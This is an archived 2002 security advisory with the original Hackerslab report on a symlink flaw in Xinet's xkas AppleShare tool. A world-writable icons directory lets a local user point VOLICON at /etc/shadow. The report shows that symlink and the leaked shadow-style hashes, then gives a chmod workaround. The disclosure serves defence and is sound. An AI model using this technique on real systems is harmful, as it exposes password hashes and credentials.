Xinet's 'xkas' AppleShare Administration Tool Discloses Any Local File Contents to Local Users
|
|
SecurityTracker Alert ID: 1003379 |
|
SecurityTracker URL: http://securitytracker.com/id/1003379
|
|
CVE Reference:
CAN-2002-0213
(Links to External Site)
|
Date: Jan 28 2002
|
Impact:
Disclosure of system information, Disclosure of user information
|
Exploit Included: Yes
|
|
Description:
Hackerslab reported a vulnerability in Xinet's 'xkas' AppleShare administration tool for UNIX systems. A local user can view files on the server with root privileges.
It is reported that when a local user shares a directory, the application creates the '.HSResource' directory and the '.HSicon' file. The '.HSicon' file is reportedly created by copying the '/var/adm/appletalk/icons/VOLICON' file. It is reported that the /var/adm/appletalk/icons directory is configured with 777 permissions (i.e., world read, write, and execute), allowing an unprivileged local user to create a symbolic link from the VOLICON file to another critical file on the server. Then, when a local user (the AppleShare administrator) invokes the 'xkas' application to share the directory, the application will copy the linked file to that directory (instead of the intended VOLICON file). The newly created '.HSicon' file may have world readable privileges.
|
Impact:
A local user may be able to view specific files on the server with root level privileges.
|
Solution:
No solution was available at the time of this entry.
The author of the report suggests, as a workaround, removing 'other' write permissions from the icons directory:
$ su -
# chmod o-w /var/adm/appletalk/icons
|
Vendor URL: www.xinet.com/ (Links to External Site)
|
Cause:
Access control error, Configuration error
|
Underlying OS:
UNIX (SGI/IRIX), UNIX (Solaris - SunOS)
|
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Mon, 28 Jan 2002 18:06:16 +0900 (KST)
Subject: [ Hackerslab bug_paper ] Xkas application vulnerability
|
=============================================================================
[ Hackerslab bug_paper ] Xkas application vulnerability
=============================================================================
File : /usr/etc/appletalk/xkas application
SYSTEM : tested irix 6.5
INFO :
Xkas is a server administration tool for appleshare. Misconfiguration by the user with the root privilege could lead to a serious
security vulnerability.
.HSResource directory and .HSicon file is created when sharing a directory.
Creation of the HSicon file is accomplished by copying the /var/adm/appletalk/icons/VOLICON file. A problem occurs during this process
because the permission of /var/adm/appletalk/icons directory is set to 777 (world-writeable).
Link the wanted file with VOLICON like the following.
$ ls -al /var/adm/appletalk/icons
total 8
drwxrwxrwx 4 root sys 57 Jan 25 03:12 .
drwxr-xr-x 6 root sys 4096 Jan 24 16:05 ..
drwxr-xr-x 2 root sys 9 Jan 25 03:12 .HSResource
lrwxr-xr-x 1 loveyou user 11 Jan 25 03:05 VOLICON -> /etc/shadow
When the administrator uses the /usr/etc/appletalk/xkas directory to share the root directory, the following files are created in
the root.
$ ls -al /
total 17099
drwxr-xr-x 37 root sys 4096 Jan 25 03:30 .
drwxr-xr-x 37 root sys 4096 Jan 25 03:30 ..
drwxr-xr-x 2 root sys 9 Jan 25 03:30 .HSResource
-rw-r--r-- 1 root sys 786 Jan 25 03:30 .HSicon
(etc..)
$ cat /.HSicon
root:y7floveyous30I:10908::::::
bin:yxaiFduxixe8s:11127::::::
uucp:*:11127::::::
sys:*:11127::::::
adm:*:11127::::::
loveyou:mXaa2jxi/ejY:10877::::::
(etc..)
SOLUTION :
Remove other-write permission, contact your vendor and get a patch.
$ su -
# chmod o-w /var/adm/appletalk/icons
==-------------------------------------------------------------------------==
*********
* ** ** *
* ** ** *
* ******* * Kim Yong-Jun
* ** ** * loveyou@hackerslab.org
* ** ** * [ http://www.hackerslab.org ]
********* HACKERSLAB (C) since 1999
==-------------------------------------------------------------------------==
¿ëÁØ
|
|
